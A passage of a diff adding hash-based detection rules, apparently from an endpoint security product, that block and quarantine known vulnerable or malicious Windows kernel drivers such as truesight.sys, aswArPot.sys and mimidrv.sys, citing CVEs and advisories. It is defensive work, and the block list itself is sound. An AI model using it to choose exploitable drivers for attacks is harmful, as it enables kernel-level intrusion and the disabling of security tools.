+ "references": [],
+ "type": "hash",
+ "value": "23bfa2f2b253cacd504bf7141aacf95542508138eaaf11552f33e914b098c9cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91555588-79da-56ca-99f9-eba95eea2ba5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816707Z",
+ "creation_date": "2026-03-23T11:45:31.816710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd0052710de851fdb5d8f0fa875ac925f026b13b888c2439f3fd9038932f85ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9156020e-a274-5d99-8854-4d6a9478f5aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488943Z",
+ "creation_date": "2026-03-23T11:45:31.488945Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "423eda2ea7f8197dc85633096f4b005c608a049185907d454efe559d6788eeb2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "916fff25-1937-5bdf-8560-8c46ee17d94c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478317Z",
+ "creation_date": "2026-03-23T11:45:30.478320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d998ea6d0051e17c1387c9f295b1c79bacb2f61c23809903445f60313d36c7fd",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "917065f7-dec3-5521-b073-5c1067c35c6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825102Z",
+ "creation_date": "2026-03-23T11:45:30.825106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48ea9d497622facdf3b510c351059b2a9bedb0863dca334baa1ca70fdab985f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "917ebf99-a250-562a-b29e-89464db134fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818243Z",
+ "creation_date": "2026-03-23T11:45:30.818245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18047c2d45758a43d6b7e56bcd4aa90354c899795baf944f037850c48d8e892a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "919513ef-f647-52a4-ba39-c74fcb02e25f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143750Z",
+ "creation_date": "2026-03-23T11:45:31.143754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "898fcc32c0c37991f8d4322f24a33c1f39fd73b992d5f70c7393e9b870e46be6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9195dd54-7122-5e27-a305-a55aed05cc05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968970Z",
+ "creation_date": "2026-03-23T11:45:29.968972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d43769b353d63093228a59eb19bba87ce6b552d7e1a99bf34a54eee641aa0ea",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "919f386d-2cc9-5197-8489-dfff36a6f490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143492Z",
+ "creation_date": "2026-03-23T11:45:31.143494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bbe054c92229e0ddbdf7938d63488f95259f9fe7e67a216d1e6ce98bcbd10a4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91b2498a-1f99-59cc-9823-a4dbe564ebd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467239Z",
+ "creation_date": "2026-03-23T11:45:30.467242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467251Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e37671575137d4e726efe2cfb730455bfcc5c08d553330dc68840ce8f7c63280",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91c3b556-41bc-52b8-b2e6-71c0a5053403",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475016Z",
+ "creation_date": "2026-03-23T11:45:30.475020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55054ac1fab3b2fb370640035d50d00ae41775c45a16d0737a11cef1da48faff",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91c9ccd6-d970-539d-a801-3d06b0290aa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972226Z",
+ "creation_date": "2026-03-23T11:45:29.972229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972238Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee625d1910f91fc9e79237bd60b0ee5efb85c7f859922f30e4434db6cd50fa9b",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91db4c1a-0b1a-5124-8ac6-4e3b4c811f0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140907Z",
+ "creation_date": "2026-03-23T11:45:31.140909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ed3d20dba43947d133ffebe08eb9caf0ca0ad822929af6e3fa9c427fd3dba03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91e6480f-a4b4-5263-bc8d-642f594bc441",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615537Z",
+ "creation_date": "2026-03-23T11:45:29.615539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615544Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ef80a6b63766ca36e2f2a7d29c49dc5859a58604bd8fde15011d8c379f76e01",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91e709da-f699-50d7-afc6-87c9d5da2abc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469131Z",
+ "creation_date": "2026-03-23T11:45:30.469134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c068b3c86f5776e9a26680952de22e156ec9700d9c1810e5fd344c994d50419",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91f1af97-5f41-539c-a3e6-1d00ce99e5df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834270Z",
+ "creation_date": "2026-03-23T11:45:30.834273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "940cd600f3a673f646ab309e9d5f916d8071053f3b4b2cb078f3e2af3f9e887e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91f6c5ec-a8ae-5e8e-ac5a-002cf5d5acab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452341Z",
+ "creation_date": "2026-03-23T11:45:30.452344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "743302af4224d5f44489290c01391c03b928126d726b72e7602fe5760e6d9519",
+ "comment": "Vulnerable Kernel Driver (aka phydmaccx64.sys) [https://www.loldrivers.io/drivers/96c8fe71-3acc-41bc-9402-ebd69a961d74/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9200d4ca-f255-598c-8d67-6c5906a24f4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971597Z",
+ "creation_date": "2026-03-23T11:45:29.971599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b529550e8d2ec6133be50d7139179654301ff84ba09da0cd256c5dec924a185c",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "920b2e91-578b-53ae-8b73-3665e05db90c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810750Z",
+ "creation_date": "2026-03-23T11:45:31.810752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90c21147369071ed5a602577047866b8e752a25fc26e47459b3ef907f5cd0bfc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "920ff94f-7482-5884-afe7-594aef5fdedb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822246Z",
+ "creation_date": "2026-03-23T11:45:30.822248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f4647364210b9ec997483f9a707a733c4e1b59263c1046301dee90890273f34",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "922128af-2b93-5147-89d4-01d31de02675",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816344Z",
+ "creation_date": "2026-03-23T11:45:31.816348Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12017d1a1f91ae937850d8e4314f892125491f60893ee3f7de46c76edbb7b2d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "922288eb-9c60-5443-ada1-0091e78f03ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144921Z",
+ "creation_date": "2026-03-23T11:45:32.144923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "290bc7822da41f0b5580b27c8d14a2a5c3fbe3e4b6921957b134efc6beeb0aeb",
+ "comment": "Malicious Kernel Driver (aka driver_290bc782.sys) [https://www.loldrivers.io/drivers/f5c1a46f-21e6-4b06-b212-2dc55b699497/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9224f3a4-8c72-5a3b-b2bc-67e05a072ae3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620090Z",
+ "creation_date": "2026-03-23T11:45:29.620092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29",
+ "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92256309-07db-5ad7-adf5-b03b2103b634",
